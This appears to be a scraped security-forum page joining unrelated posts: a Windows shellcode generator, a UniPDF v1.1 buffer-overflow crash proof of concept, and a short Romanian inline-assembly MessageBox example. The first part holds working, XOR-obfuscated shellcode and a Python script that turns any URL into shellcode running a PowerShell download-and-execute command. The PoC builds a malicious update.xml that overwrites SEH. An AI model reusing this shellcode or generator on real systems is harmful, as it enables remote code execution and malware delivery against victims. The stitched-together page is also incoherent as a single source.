xor %ebx,%eax 20a: 50 push %eax 20b: 89 e0 mov %esp,%eax 20d: bb 41 41 41 01 mov $0x1414141,%ebx 212: c1 eb 08 shr $0x8,%ebx 215: c1 eb 08 shr $0x8,%ebx 218: c1 eb 08 shr $0x8,%ebx 21b: 53 push %ebx 21c: 50 push %eax 21d: bb 95 e6 b1 77 mov $0x77b1e695,%ebx 222: ff d3 call *%ebx 224: bb cf 2a ae 77 mov $0x77ae2acf,%ebx 229: ff d3 call *%ebx C:\Users\Ali\Desktop> #you have your shellcode now ======================================= shellcode.c #include <stdio.h> #include <string.h> int main(){ unsigned char shellcode[]= "\x31\xc0\x50\x68\x41\x41\x65\x22\x58\xc1\xe8\x08\xc1\xe8\x08\x50\xb8\x34\x47\x0b\x4d\xbb\x5d\x69\x6e\x35\x31\xd8\x50\xb8\x43\x32\x10\x22\xbb\x79\x6e\x51\x4e\x31\xd8\x50\xb8\x60\x05\x42\x32\xbb\x49\x78\x79\x71\x31\xd8\x50\xb8\x0f\x1c\x2c\x14\xbb\x6a\x64\x49\x33\x31\xd8\x50\xb8\x07\x3e\x0b\x40\xbb\x46\x52\x62\x6e\x31\xd8\x50\xb8\x44\x0a\x78\x07\xbb\x63\x49\x42\x5b\x31\xd8\x50\xb8\x0f\x16\x4b\x0d\xbb\x6a\x31\x67\x2d\x31\xd8\x50\xb8\x18\x62\x5c\x1f\xbb\x61\x4c\x39\x67\x31\xd8\x50\xb8\x1b\x2d\x1e\x1f\xbb\x6b\x58\x6a\x6b\x31\xd8\x50\xb8\x45\x40\x41\x66\xbb\x3d\x78\x77\x49\x31\xd8\x50\xb8\x02\x1f\x4b\x45\xbb\x6d\x6b\x38\x6a\x31\xd8\x50\xb8\x24\x3e\x19\x32\xbb\x45\x4e\x6a\x5a\x31\xd8\x50\xb8\x00\x5e\x3a\x35\xbb\x6c\x73\x49\x5b\x31\xd8\x50\xb8\x1f\x37\x40\x24\xbb\x6d\x52\x32\x41\x31\xd8\x50\xb8\x2e\x35\x68\x31\xbb\x5a\x4c\x45\x41\x31\xd8\x50\xb8\x48\x1e\x1c\x15\xbb\x67\x6e\x69\x61\x31\xd8\x50\xb8\x26\x28\x0d\x5d\xbb\x4f\x45\x62\x33\x31\xd8\x50\xb8\x20\x57\x1d\x45\xbb\x47\x78\x63\x36\x31\xd8\x50\xb8\x04\x6a\x24\x3b\xbb\x77\x44\x4b\x49\x31\xd8\x50\xb8\x18\x0f\x0a\x32\xbb\x6c\x6e\x78\x47\x31\xd8\x50\xb8\x7d\x18\x3c\x27\xbb\x52\x6c\x5d\x55\x31\xd8\x50\xb8\x03\x44\x60\x60\xbb\x77\x34\x5a\x4f\x31\xd8\x50\xb8\x47\x6b\x1f\x20\xbb\x6f\x4c\x77\x54\x31\xd8\x50\xb8\x2a\x5e\x2b\x20\xbb\x6c\x37\x47\x45\x31\xd8\x50\xb8\x59\x07\x12\x0e\xbb\x35\x68\x73\x6a\x31\xd8\x50\xb8\x01\x59\x11\x2c\xbb\x45\x36\x66\x42\x31\xd8\x50\xb8\x22\x22\x4e\x5a\xbb\x4c\x56\x67\x74\x31\xd8\x50\xb8\x00\x37\x1b\x48\xbb\x43\x5b\x72\x2d\x31\xd8\x50\xb8\x4a\x1f\x22\x13\xbb\x64\x48\x47\x71\x31\xd8\x50\xb8\x6a\x23\x03\x18\xbb\x4a\x6d\x66\x6c\x31\xd8\x50\xb8\x2d\x54\x57\x1c\xbb\x47\x31\x34\x68\x31\xd8\x50\xb8\x4e\x15\x36\x5a\xbb\x39\x38\x79\x38\x31\xd8\x50\xb8\x59\x7f\x1f\x04\xbb\x79\x57\x51\x61\x31\xd8\x50\xb8\x47\x56\x1d\x2f\xbb\x65\x70\x3d\x54\x31\xd8\x50\xb8\x2c\x18\x08\x54\xbb\x4d\x76\x6c\x74\x31\xd8\x50\xb8\x5a\x34\x58\x1b\xbb\x39\x5b\x35\x76\x31\xd8\x50\xb8\x3f\x0f\x4b\x41\xbb\x53\x63\x6b\x6c\x31\xd8\x50\xb8\x4a\x1e\x59\x0b\xbb\x38\x6d\x31\x6e\x31\xd8\x50\xb8\x49\x2b\x16\x2a\xbb\x39\x44\x61\x4f\x31\xd8\x50\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\x95\xe6\xb1\x77\xff\xd3\xbb\xcf\x2a\xae\x77\xff\xd3"; fprintf(stdout,"Length: %d\n\n",strlen(shellcode)); (*(void(*)()) shellcode)(); } ======================================= C:\Users\Ali\Desktop>gcc shellcode.c -o shellcode.exe C:\Users\Ali\Desktop>shellcode.exe Length: 173 C:\Users\Ali\Desktop> #notice : when program exit, you must wait 2-3 second , it will finish download and execute file after 2-3 second ''' import random,binascii chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz123456789=[]-' p1 = '''xor eax,eax push eax ''' p2 = ''' mov eax,esp mov ebx,0x01414141 shr ebx,0x08 shr ebx,0x08 shr ebx,0x08 push ebx push eax mov ebx,0x77b1e695 call ebx mov ebx,0x77ae2acf call ebx ''' sen1 = str(raw_input('Enter url\nExample: http://z3r0d4y.com/file.exe \nEnter:')) sen1 = sen1.rsplit() sen1 = sen1[0] sen2 = str(raw_input('Enter filename\nExample: D:\\file.exe\nEnter:')) sen2 = sen2.rsplit() sen2 = sen2[0] sen = '''powershell -command "& { (New-Object Net.WebClient).DownloadFile('%s', '%s')};%s"''' %(sen1,sen2,sen2) m = 0 for word in sen: m += 1 m = m - 1 stack = '' while(m>=0): stack += sen[m] m -= 1 stack = stack.encode('hex') skip = 1 if len(stack) % 8 == 0: skip = 0 if skip is 1: stack = '00' + stack if len(stack) % 8 == 0: skip = 0 if skip is 1: stack = '00' + stack if len(stack) % 8 == 0: skip = 0 if skip is 1: stack = '00' + stack if len(stack) % 8 == 0: skip = 0 if len(stack) % 8 == 0: zxzxzxz = 0 m = len(stack) / 8 c = 0 n = 0 z = 8 shf = open('shellcode.asm','w') shf.write(p1) shf.close() shf = open('shellcode.asm','a') while(c<m): v = 'push 0x' + stack[n:z] skip = 0 if '0x000000' in v: skip = 1 q1 = v[13:] v = 'push 0x' + q1 + '414141' + '\n' + 'pop eax\nshr eax,0x08\nshr eax,0x08\nshr eax,0x08\npush eax\n' if '0x0000' in v: skip = 1 q1 = v[11:] v = 'push 0x' + q1 + '4141' + '\n' + 'pop eax\nshr eax,0x08\nshr eax,0x08\npush eax\n' if '0x00' in v: skip = 1 q1 = v[9:] v = 'push 0x' + q1 + '41' + '\n' + 'pop eax\nshr eax,0x08\npush eax\n' if skip is 1: shf.write(v) if skip is 0: v = v.rsplit() zzz = '' for w in v: if '0x' in w: zzz = str(w) s1 = binascii.b2a_hex(''.join(random.choice(chars) for i in range(4))) s1 = '0x%s'%s1 data = "%x" % (int(zzz, 16) ^ int(s1, 16)) v = 'mov eax,0x%s\nmov ebx,%s\nxor eax,ebx\npush eax\n'%(data,s1) shf.write(v) n += 8 z += 8 c += 1 shf.write(p2) shf.close()

wow!

# Exploit Title: UniPDF v1.1 BufferOverflow, SEH overwrite DoS PoC # Google Dork: [none] # Date: 01/28/2015 # Exploit Author: bonze # Email: dungvtr@gmail.com # Vendor Homepage: http://unipdf.com/ # Software Link: http://unipdf.com/file/unipdf-setup.exe (Redirect to: http://unipdf-converter.en.softonic.com/download) # Version: 1.1 # Tested on: Windows 7 SP1 EN # CVE : [none] # Note: # Function MultiByteToWideChar will overwrite RET and SEH pointer, but I can't make exception occur before StackCookie checking # Please tell me if you have any ideal #013E8012 |. 68 00020000 PUSH 200 ; /WideBufSize = 200 (512.) #013E8017 |. 8D8C24 9C0000> LEA ECX,DWORD PTR SS:[ESP+9C] ; | #013E801E |. 51 PUSH ECX ; |WideCharBuf #013E801F |. 52 PUSH EDX ; |StringSize #013E8020 |. 50 PUSH EAX ; |StringToMap #013E8021 |. 6A 00 PUSH 0 ; |Options #013E8023 |. 6A 00 PUSH 0 ; |CodePage = CP_ACP #013E8025 |. FF15 54B45101 CALL NEAR DWORD PTR DS:[<&KERNEL32.Multi> ; \MultiByteToWideChar #013E802B |. 8D87 08020000 LEA EAX,DWORD PTR DS:[EDI+208] # At Offset: 327-> overwrite nSEH # At Offset: 329-> overwrite SEH # badchar = 0x22 buff2 = "A" * 325 buff2+= "CC" # nSEH buff2+= "BB" # SEH crash2 = "<config>\n" crash2 += " <current Dat=\"1422420474\" />\n" crash2 += " <Dat Txt=\""+buff2+"\" />\n" crash2 += "</config>\n" # Copy file update.xml to UniPDF Application Folder and run UniPDF.exe file = open("update.xml","w") file.write(crash2) file.close() print "UniPDF v1.1 Crash PoC by bonze at FPT-IS" print "Email: dungvtr@gmail.com" print "File Created" Source

A fost un mic pariu cu @Usr6.M-am gandit sa il postez aici pentru cine vrea sa foloseasca functii din windows.h in asm. #include "windows.h" char a2[]="usr6"; char a3[]="Salut"; int main() { __asm { mov eax,0 push eax mov eax,offset a3 push eax mov eax,offset a2 push eax mov eax,0 push eax call DWORD PTR MessageBox pop ebx pop ebx pop ebx pop ebx } }